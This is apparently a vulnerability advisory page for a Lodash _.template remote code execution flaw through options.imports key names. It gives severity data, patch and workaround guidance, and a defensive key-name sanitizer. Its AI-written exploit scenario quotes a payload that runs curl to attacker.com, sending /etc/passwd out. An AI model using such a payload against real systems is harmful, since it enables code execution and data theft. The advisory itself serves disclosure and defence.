Severity by source
Primary rating from NVD.
CVSS vector (NVD): CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Blast Radius
Ecosystem impact:
- 224 npm packages depend on lodash (119 direct, 110 indirect)
- 1 npm package depends on lodash-es (1 direct, 0 indirect)
- 2 npm packages depend on lodash.template (1 direct, 1 indirect)
Ecosystem-wide dependent count for version 4.0.0 and other introduced versions.
Description (CVE.org)
Impact:
The fix for CVE-2021-23337 (https://github.com/advisories/GHSA-35jh-r3h4-6jhm) added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink.
When an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time.
Additionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().
Patches:
Users should upgrade to version 4.18.0.
Workarounds:
Do not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names.
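A defender-side gate for options.imports that enforces the workaround above, as an added example that is neither Lodash's nor the advisory's own code: it accepts only identifier-shaped key names and only own properties, and it also shows what a for..in based merge would pick up from a polluted prototype. The identifier pattern and reserved-word list are assumptions, not the validation that Lodash 4.18.0 ships.

```javascript
// Added example, not Lodash's or the advisory's own code: gate the
// options.imports object before it reaches _.template so only identifier-
// shaped, own property names are passed on. The identifier pattern and the
// reserved-word list are assumptions, not the validation Lodash 4.18.0 ships.
const IDENTIFIER = /^[A-Za-z_$][A-Za-z0-9_$]*$/;

// Identifier-shaped words that are still illegal as parameter names.
const RESERVED = new Set([
  'await', 'break', 'case', 'catch', 'class', 'const', 'continue', 'debugger',
  'default', 'delete', 'do', 'else', 'enum', 'export', 'extends', 'finally',
  'for', 'function', 'if', 'implements', 'import', 'in', 'instanceof',
  'interface', 'let', 'new', 'package', 'private', 'protected', 'public',
  'return', 'static', 'super', 'switch', 'this', 'throw', 'try', 'typeof',
  'var', 'void', 'while', 'with', 'yield',
]);

// Safe only if the name is a plain identifier; a name containing '=' for
// instance would be parsed by Function() as a parameter default expression.
function isSafeImportName(name) {
  return typeof name === 'string' && IDENTIFIER.test(name) && !RESERVED.has(name);
}

// What a for..in merge (the assignInWith path) sees: own keys first, then
// every enumerable key inherited through the prototype chain.
function keysSeenByForIn(obj) {
  const seen = [];
  for (const key in obj) seen.push(key);
  return seen;
}

// Null-prototype copy holding only own, validated keys, so neither
// attacker-chosen names nor inherited (polluted) properties reach the
// Function() parameter list. Throws rather than silently dropping a key.
function sanitizeImports(imports) {
  const clean = Object.create(null);
  for (const name of Object.keys(imports ?? {})) {
    if (!isSafeImportName(name)) {
      throw new TypeError(`invalid imports key name: ${JSON.stringify(name)}`);
    }
    clean[name] = imports[name];
  }
  return clean;
}

// Constructed demonstration inputs (not taken from the advisory).
const goodImports = { escapeHtml: (s) => String(s).replace(/</g, '&lt;') };
const badImports = { 'x=1': 1 };
// Stand-in for a polluted prototype: 'polluted' is inherited, 'ok' is own.
const inheritedImports = Object.assign(Object.create({ polluted: 1 }), { ok: 2 });
```

Pass `sanitizeImports(userSuppliedImports)` as `options.imports` instead of the raw object; the thrown TypeError is the signal to log and alert on.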
Analysis (AI)
Remote code execution in Lodash <4.18.0 allows unauthenticated attackers to execute arbitrary JavaScript code during template compilation by injecting malicious key names into options.imports parameter. The vulnerability bypasses the CVE-2021-23337 fix by exploiting an unvalidated code path that flows into the same Function() constructor sink. …
Vulnerability Assessment (AI)
| Aspect | Assessment |
|---|---|
| Exploitation | Attacker must pass untrusted input as options.imports key names to _.template() in Lodash. … |
| Risk Assessment | The CVSS 8.1 score reflects high impact across confidentiality, integrity, and availability (C:H/I:H/A:H), with network attack vector (AV:N) and no privileges required (PR:N), making this broadly exploitable. … |
| Exploit Scenario | An attacker identifies a Node.js web application using Lodash templates to render user dashboards, where dashboard configuration includes user-supplied widget names passed as keys in options.imports. The attacker registers a dashboard widget with the key name set to a malicious payload like 'x=require("child_process").execSync("curl attacker.com/exfil?data=$(cat /etc/passwd)")'. … |
| Remediation | Vendor-released patch: upgrade all Lodash installations to version 4.18.0 or later, which adds input validation for options.imports key names matching the protection applied to the variable option in CVE-2021-23337. … |
Recommended Action (AI)
Within 24 hours: Inventory all applications using Lodash <4.18.0 via dependency scanning (npm audit, SBOM tools, or Software Composition Analysis platforms). …
Vendor Status
SUSE (severity: High)
| Product | Status |
|---|---|
| SUSE Liberty Linux 9 | Fixed |
Identifiers: EUVD-2026-17610, GHSA-r5fr-rjxr-66jc